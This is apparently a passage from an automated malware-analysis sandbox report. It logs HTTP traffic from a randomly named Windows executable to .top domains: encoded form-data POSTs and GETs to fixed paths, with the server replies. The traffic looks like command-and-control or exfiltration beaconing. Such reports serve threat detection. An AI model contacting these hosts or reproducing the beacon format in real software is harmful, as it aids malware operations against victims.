                                                      Origin: http://www.pku-cs-cjw.top
                                                      Referer: http://www.pku-cs-cjw.top/k3hn/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 51 6b 4a 5a 44 54 70 46 5a 72 35 72 30 39 42 78 37 30 66 2f 4c 48 4f 42 4e 69 46 36 45 79 6b 76 78 65 4e 4e 76 78 49 3d
                                                      Data Ascii: rPh=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5QkJZDTpFZr5r09Bx70f/LHOBNiF6EykvxeNNvxI=
                                                      Dec 17, 2024 08:24:13.598678112 CET488INHTTP/1.1 405 Method Not Allowed
                                                      Connection: close
                                                      Content-Length: 131
                                                      Server: Varnish
                                                      Retry-After: 0
                                                      Accept-Ranges: bytes
                                                      Date: Tue, 17 Dec 2024 07:24:13 GMT
                                                      Via: 1.1 varnish
                                                      X-Served-By: cache-ewr-kewr1740035-EWR
                                                      X-Cache: MISS
                                                      X-Cache-Hits: 0
                                                      X-Timer: S1734420253.446138,VS0,VE0
                                                      X-Fastly-Request-ID: ad03b0d3da76c51c6ffe71afdbd28b8c0ba8fe31
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.849710185.199.110.153805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:15.354027987 CET753OUTPOST /k3hn/ HTTP/1.1
                                                      Host: www.pku-cs-cjw.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 224
                                                      Connection: close
                                                      Origin: http://www.pku-cs-cjw.top
                                                      Referer: http://www.pku-cs-cjw.top/k3hn/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 61 34 39 4a 4d 55 74 49 6e 33 39 38 76 4a 6f 64 6a 57 42 51 7a 2b 72 58 30 4a 57 69 6e 70 6a 33 4f 37 47 4a 41 4f 57 61 47 39 73 4b 73 4f 5a 7a 37 6a 47 50 54 6f 65 73 78 68 6f 64 55 52 42 48 7a 67 6e 43 37 35 35 50 71 57 45 6c 67 51 69 4c 4a 6a 35 79 6f 37 6d 36 7a 74 6a 67 7a 4a 4f 49 47 6c 6d 55 6f 62 36 65 46 6d 69 6b 4b 67 43 42 6d 46 33 70 4d 79 6e 32 72 73 56 4f 41 77 61 2f 54 51 52 59 43 75 31 4f 43 42 74 4f 77 70 4d 4c 62 38 42 67 53 33 35 49 47 7a 35 70 59 49 4a 57 34 72 77 62 68 57 58 35 49 48 6d 71 4e 68 74 4d 42 46 35 48 72 39 64 39 78 6d 65 47 62 4c 71 6c 4c 56 69 50 46 74 67 61 43 55 47 76 53 32 79 62
                                                      Data Ascii: rPh=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinpj3O7GJAOWaG9sKsOZz7jGPToesxhodURBHzgnC755PqWElgQiLJj5yo7m6ztjgzJOIGlmUob6eFmikKgCBmF3pMyn2rsVOAwa/TQRYCu1OCBtOwpMLb8BgS35IGz5pYIJW4rwbhWX5IHmqNhtMBF5Hr9d9xmeGbLqlLViPFtgaCUGvS2yb
                                                      Dec 17, 2024 08:24:16.358285904 CET488INHTTP/1.1 405 Method Not Allowed
                                                      Connection: close
                                                      Content-Length: 131
                                                      Server: Varnish
                                                      Retry-After: 0
                                                      Accept-Ranges: bytes
                                                      Date: Tue, 17 Dec 2024 07:24:16 GMT
                                                      Via: 1.1 varnish
                                                      X-Served-By: cache-ewr-kewr1740036-EWR
                                                      X-Cache: MISS
                                                      X-Cache-Hits: 0
                                                      X-Timer: S1734420256.205239,VS0,VE0
                                                      X-Fastly-Request-ID: 2644e5972431060cd7e8bf0a092b6ca961889b16
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.849711185.199.110.153805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:18.238291979 CET1770OUTPOST /k3hn/ HTTP/1.1
                                                      Host: www.pku-cs-cjw.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1240
                                                      Connection: close
                                                      Origin: http://www.pku-cs-cjw.top
                                                      Referer: http://www.pku-cs-cjw.top/k3hn/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 61 34 39 4a 4d 55 74 49 6e 33 39 38 76 4a 6f 64 6a 57 42 51 7a 2b 72 58 30 4a 57 69 6e 70 37 33 4f 4a 2b 4a 42 70 36 61 49 64 73 4b 7a 2b 5a 32 37 6a 48 54 54 6f 57 6f 78 68 6c 67 55 53 35 48 7a 44 76 43 73 37 52 50 6b 57 45 6c 69 51 69 4b 4b 54 34 32 6f 37 32 32 7a 74 54 67 7a 4a 4f 49 47 69 65 55 38 34 69 65 44 6d 69 6c 61 77 43 64 78 31 33 52 4d 79 2f 41 72 71 4a 65 41 41 36 2f 55 77 42 59 5a 39 64 4f 66 78 74 4d 7a 70 4e 59 62 38 4e 46 53 7a 59 35 47 77 6c 48 59 49 68 57 37 74 31 66 2b 6e 76 59 62 68 32 68 4d 53 70 4d 46 31 67 6b 71 39 64 36 73 48 47 62 61 4e 75 76 46 57 57 62 41 66 38 58 63 53 36 58 55 68 54 6c 55 66 73 6c 58 4e 77 75 57 48 31 70 58 36 4d 57 44 43 35 59 4c 31 59 33 62 75 67 47 67 4f 4f 53 36 47 5a 4f 31 35 73 76 65 55 73 33 55 67 63 31 30 5a 33 62 56 75 70 46 65 4f 6b 67 43 75 61 73 5a 34 7a 37 34 66 6f 65 4e 6a 71 58 4a 76 66 74 39 43 54 39 69 54 73 68 38 78 6d 64 45 79 70 55 73 4f 79 6b 37 39 75 33 4f 64 67 49 4e 41 67 4d 39 6e [TRUNCATED]
                                                      Data Ascii: rPh=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinp73OJ+JBp6aIdsKz+Z27jHTToWoxhlgUS5HzDvCs7RPkWEliQiKKT42o722ztTgzJOIGieU84ieDmilawCdx13RMy/ArqJeAA6/UwBYZ9dOfxtMzpNYb8NFSzY5GwlHYIhW7t1f+nvYbh2hMSpMF1gkq9d6sHGbaNuvFWWbAf8XcS6XUhTlUfslXNwuWH1pX6MWDC5YL1Y3bugGgOOS6GZO15sveUs3Ugc10Z3bVupFeOkgCuasZ4z74foeNjqXJvft9CT9iTsh8xmdEypUsOyk79u3OdgINAgM9nrMMneuWiZd+/Cf1ide2SSh7oYlohEcaorBp0YH3OZw9E56wm41Xzvp3/K97Y8GbSwGYv5qMP6fRSYRMPOPG4OBfIE9q0O+E+KrKJ1Iab30/GIbAnXbsjScpug2WVsNk8BlHKsDVkd9TuuWawmYjhqyZsBFtZ4M8NMeLLyxi9jo/c1le0amutTqnB1+MVVdIuQmKmJGEucRynGnYnTU1Emf90xJWJ3DpD5ceSln2Qms5l5vTWRVEDkUDFyaG9NUZZaJV07TijZw257+cjrKR4W+cgBdZvBqkaK9RCdy2dAubp3/pMn1rkdPPoue2aX2kCFxq0yfotT1mfDwMBTfhWSPlDPCvxaBUiy5A2rvBbyZSb/yfMusHyVLfT2ytIrfHsXtveqB0k4CRkj+RuqDugC4E5Irt1yauUUq+pcnZCGAQp2f4uaFDKXbbggPDEX1+HVhWFcUSVhNQaCGQp3Qnx7Bvz55DLcfemCQ3ZVJ5iXxok20BwldlI1YL+JSkv0yFht0ZR0oIU954XlfZqtc6j3ZBB9awq5lFwl7AL6ZKI+/OEmIyP7zM/1HQ068u9n6qupcvIfg2eiAfuGiJqvzHcbvtx4tLFFJ0tN5kS1aHSCLx81t+HY5W+pMl1yA2m+6N6rsPISG9bkOH2WoR9Ydxi7mgaclBvEeXrMj [TRUNCATED]
                                                      Dec 17, 2024 08:24:19.107601881 CET488INHTTP/1.1 405 Method Not Allowed
                                                      Connection: close
                                                      Content-Length: 131
                                                      Server: Varnish
                                                      Retry-After: 0
                                                      Accept-Ranges: bytes
                                                      Date: Tue, 17 Dec 2024 07:24:18 GMT
                                                      Via: 1.1 varnish
                                                      X-Served-By: cache-nyc-kteb1890041-NYC
                                                      X-Cache: MISS
                                                      X-Cache-Hits: 0
                                                      X-Timer: S1734420259.954090,VS0,VE0
                                                      X-Fastly-Request-ID: 10c62f87de87b77266878210362e09b084b4ffe0
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.849712185.199.110.153805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:21.012799025 CET467OUTGET /k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81mcvpy2JTiV0mNzD6MbLs+vdIgTAzo2XEDLCKFuL/iGeag==&kVvpD=Bx4T HTTP/1.1
                                                      Host: www.pku-cs-cjw.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Dec 17, 2024 08:24:22.056040049 CET807INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      Content-Length: 162
                                                      Server: GitHub.com
                                                      Content-Type: text/html
                                                      X-GitHub-Request-Id: A521:3EFF42:520FED0:581AB01:67612725
                                                      Accept-Ranges: bytes
                                                      Age: 0
                                                      Date: Tue, 17 Dec 2024 07:24:21 GMT
                                                      Via: 1.1 varnish
                                                      X-Served-By: cache-ewr-kewr1740027-EWR
                                                      X-Cache: MISS
                                                      X-Cache-Hits: 0
                                                      X-Timer: S1734420262.894526,VS0,VE9
                                                      Vary: Accept-Encoding
                                                      X-Fastly-Request-ID: 98f1ed30f29922f35dc9c26c5929db337c4453bd
                                                      Location: http://pku-cs-cjw.top/k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81mcvpy2JTiV0mNzD6MbLs+vdIgTAzo2XEDLCKFuL/iGeag==&kVvpD=Bx4T
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.849713104.21.48.233805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:27.579830885 CET724OUTPOST /al74/ HTTP/1.1
                                                      Host: www.ausyva4.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 204
                                                      Connection: close
                                                      Origin: http://www.ausyva4.top
                                                      Referer: http://www.ausyva4.top/al74/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 78 64 31 54 45 6a 4b 61 7a 66 77 42 6e 6a 57 78 55 50 68 77 63 54 4c 44 55 36 6a 42 61 74 52 41 76 62 76 45 5a 48 55 39 72 32 68 63 63 54 39 72 79 62 55 44 30 4d 47 4c 6c 6e 41 79 31 36 58 53 2b 49 6c 53 45 33 54 48 75 42 49 5a 66 37 54 6f 63 78 76 34 52 5a 2b 66 75 42 66 76 48 66 37 49 37 47 48 57 49 37 6d 35 58 6e 48 53 5a 5a 4b 38 4b 6e 65 2b 65 59 66 67 49 4e 37 64 35 4d 4d 32 57 67 39 43 6a 73 6e 79 6e 37 74 62 50 46 62 38 36 35 78 50 33 71 6f 6e 31 6c 53 71 30 35 31 70 4c 78 79 6f 54 56 68 62 4f 52 39 6c 68 72 38 4c 32 38 49 41 78 30 49 74 57 78 77 3d
                                                      Data Ascii: rPh=4DLMdNWNjQmPxd1TEjKazfwBnjWxUPhwcTLDU6jBatRAvbvEZHU9r2hccT9rybUD0MGLlnAy16XS+IlSE3THuBIZf7Tocxv4RZ+fuBfvHf7I7GHWI7m5XnHSZZK8Kne+eYfgIN7d5MM2Wg9Cjsnyn7tbPFb865xP3qon1lSq051pLxyoTVhbOR9lhr8L28IAx0ItWxw=
                                                      Dec 17, 2024 08:24:28.902829885 CET1154INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:24:28 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XfFICCTSncZLZLW87I8JYFeIuAut1Tjetz4C%2B38Vn8MFMDLRDerJdvMxPS2QA8cXee3Mymx5wdTbpnBP3hm%2FwCSfDfDht4NMSeVyvpH3GxRb7VzfyJeUllqVUEcX3OiStYo%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f352c768bf4f78d-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b dd 65 45 29 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7e 2e e7 f0 50 3e 2d 60 f9 7e bb 78 bc 83 cb 11 e2 e3 bc bc 47 9c 95 b3 9f 4e 3e 9e 20 ce 9f 2f f5 70 a0 9c ec 42 a7 64 ac 56 e2 25 90 2e 26 05 3c b3 c0 3d d7 d1 2a fc 79 54 d8 8d 0c 07 6a c5 b6 3d ea 9a a2 50 d2 ca 65 7f 09 97 69 85 a7 f6 70 00 6f 9c 52 0b 1b 4e 20 8e c0 c7 35 c7 03 45 4f 71 4d 63 b5 4a a8 87 83 65 20 53 11 24 da 73 12 10 e7 2b d8 51 55 99 2d 81 89 f6 c8 84 da 52 c7 6f 38 04 6e 7c dc 82 8f 1b 4e 3b 23 9e 23 08 43 5d f5 6e a5 33 f1 0b 5a ae e1 40 a9 85 5d bd 76 17 0a f7 c7 a5 c5 ac 02 75 97 d4 9d 56 bf bf 2e a6 0a c5 9e 4a 27 b2 9f 22 36 4d 33 36 75 d5 1e 4c 31 16 de a3 09 d7 05 f6 63 78 82 7b 8b 37 4a 07 4a e7 2e a1 66 eb 5b 1a 99 a6 1a 45 b6 94 fd 87 ce 8c d0 39 98 4f f2 02 b3 1c b3 6b c8 ae a6 79 31 cd 6f fe a0 f8 fb 05 97 50 2f b9 a1 44 16 56 2d 7c 28 97 74 9f 8a 50 [TRUNCATED]
                                                      Data Ascii: 161uAK1{;eE)!mEj6&fJv{"xd{LxbrW~.P>-`~xGN> /pBdV%.&<=*yTj=PeipoRN 5EOqMcJe S$s+QU-Ro8n|N;##C]n3Z@]vuV.J'"6M36uL1cx{7JJ.f[E9Oky1oP/DV-|(tPHg1(Sa10


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.849714104.21.48.233805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:30.376171112 CET744OUTPOST /al74/ HTTP/1.1
                                                      Host: www.ausyva4.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 224
                                                      Connection: close
                                                      Origin: http://www.ausyva4.top
                                                      Referer: http://www.ausyva4.top/al74/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 4a 41 6f 36 66 45 58 6d 55 39 71 32 68 63 57 7a 39 71 74 4c 55 4b 30 4d 43 70 6c 6d 38 79 31 36 54 53 2b 49 31 53 44 41 48 41 76 52 49 68 55 62 54 6d 66 42 76 34 52 5a 2b 66 75 42 4c 56 48 66 6a 49 37 79 37 57 4a 61 6d 32 4c 33 48 52 4e 4a 4b 38 42 48 65 69 65 59 66 43 49 4d 6d 4b 35 50 6b 32 57 67 4e 43 69 2b 50 78 70 37 74 5a 58 6c 61 59 73 38 41 68 79 74 34 55 78 46 4f 64 77 5a 31 32 4b 48 44 43 4a 33 70 64 4e 52 56 4f 68 6f 55 39 7a 4c 56 6f 72 58 59 64 49 6d 6e 56 69 48 32 51 61 6f 76 59 37 50 6c 44 49 45 41 4b 73 4e 50 6a
                                                      Data Ascii: rPh=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7JAo6fEXmU9q2hcWz9qtLUK0MCplm8y16TS+I1SDAHAvRIhUbTmfBv4RZ+fuBLVHfjI7y7WJam2L3HRNJK8BHeieYfCIMmK5Pk2WgNCi+Pxp7tZXlaYs8Ahyt4UxFOdwZ12KHDCJ3pdNRVOhoU9zLVorXYdImnViH2QaovY7PlDIEAKsNPj
                                                      Dec 17, 2024 08:24:31.493892908 CET1159INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:24:31 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Tl%2Bdu7M6uRpNCdcrZYeTWzmoIG%2BkAUDAJbNxH%2ByXfeJlkfKqWFwp2WHroD8H5Qf85TCzREEwFwdOK%2BaYX6csR7WHIjpco3ZaH8hzz87xyDGxKmpmyrHBzoEAyOmekDaGiQ%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f352c86ea888ce3-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1936&rtt_var=968&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=744&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b dd 75 45 28 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7e 2e e7 f0 50 3e 2d 60 f9 7e bb 78 bc 83 cb 11 e2 e3 bc bc 47 9c 95 b3 9f 4e 3e 9e 20 ce 9f 2f f5 70 a0 9c ec 42 a7 64 ac 56 e2 25 90 2e 26 05 3c b3 c0 3d d7 d1 2a fc 79 54 d8 8d 0c 07 6a c5 b6 3d ea 9a a2 50 d2 ca 65 7f 09 97 69 85 a7 f6 70 00 6f 9c 52 0b 1b 4e 20 8e c0 c7 35 c7 03 45 4f 71 4d 63 b5 4a a8 87 83 65 20 53 11 24 da 73 12 10 e7 2b d8 51 55 99 2d 81 89 f6 c8 84 da 52 c7 6f 38 04 6e 7c dc 82 8f 1b 4e 3b 23 9e 23 08 43 5d f5 6e a5 33 f1 0b 5a ae e1 40 a9 85 5d bd 76 17 0a f7 c7 a5 c5 ac 02 75 97 d4 9d 56 bf bf 2e a6 0a c5 9e 4a 27 b2 9f 22 36 4d 33 36 75 d5 1e 4c 31 16 de a3 09 37 05 f6 63 78 82 7b 8b 37 4a 07 4a e7 2e a1 66 eb 5b 1a 99 a6 1a 45 b6 94 fd 87 ce 8c d0 39 98 4f f2 02 b3 1c b3 1b c8 ae a7 79 31 bd fa 8b e2 ef 17 5c 42 bd e4 86 12 59 58 b5 f0 a1 5c d2 7d 2a 42 71 [TRUNCATED]
                                                      Data Ascii: 161uAK1{;uE(!mEj6&fJv{"xd{LxbrW~.P>-`~xGN> /pBdV%.&<=*yTj=PeipoRN 5EOqMcJe S$s+QU-Ro8n|N;##C]n3Z@]vuV.J'"6M36uL17cx{7JJ.f[E9Oy1\BYX\}*Bq#OxV10


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.849715104.21.48.233805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:33.362102985 CET1761OUTPOST /al74/ HTTP/1.1
                                                      Host: www.ausyva4.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1240
                                                      Connection: close
                                                      Origin: http://www.ausyva4.top
                                                      Referer: http://www.ausyva4.top/al74/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 42 41 76 4d 4c 45 58 42 34 39 34 6d 68 63 56 7a 39 33 74 4c 56 59 30 4b 71 74 6c 6d 77 49 31 34 62 53 2b 71 4e 53 43 31 72 41 68 52 49 68 62 37 54 6e 63 78 75 77 52 64 6a 57 75 42 62 56 48 66 6a 49 37 7a 72 57 4f 4c 6d 32 62 48 48 53 5a 5a 4b 47 4b 6e 65 47 65 63 37 34 49 4d 6a 33 6c 75 45 32 57 41 64 43 67 4c 54 78 32 4c 74 66 43 6c 61 41 73 38 45 69 79 70 59 59 78 47 54 4b 77 62 6c 32 49 54 69 69 51 32 6b 46 61 53 64 35 73 66 34 46 39 63 5a 45 70 68 42 72 44 42 32 32 71 7a 2f 2f 63 65 6e 76 32 38 38 6d 61 51 67 62 69 4a 65 79 6d 70 64 35 69 6e 6d 4d 57 6f 62 43 75 66 7a 42 71 30 35 53 52 68 41 49 56 42 46 38 35 43 61 55 6d 4b 69 73 41 65 59 30 78 76 61 50 74 4f 4d 77 64 34 54 74 42 4d 4a 66 38 31 6e 2b 6e 75 44 4b 35 6c 52 34 45 39 35 55 69 33 51 47 74 55 67 4b 38 30 31 44 55 70 67 58 57 59 61 30 53 48 2f 38 33 39 6f 39 69 42 36 68 66 50 41 6b 6c 43 2b 48 42 77 [TRUNCATED]
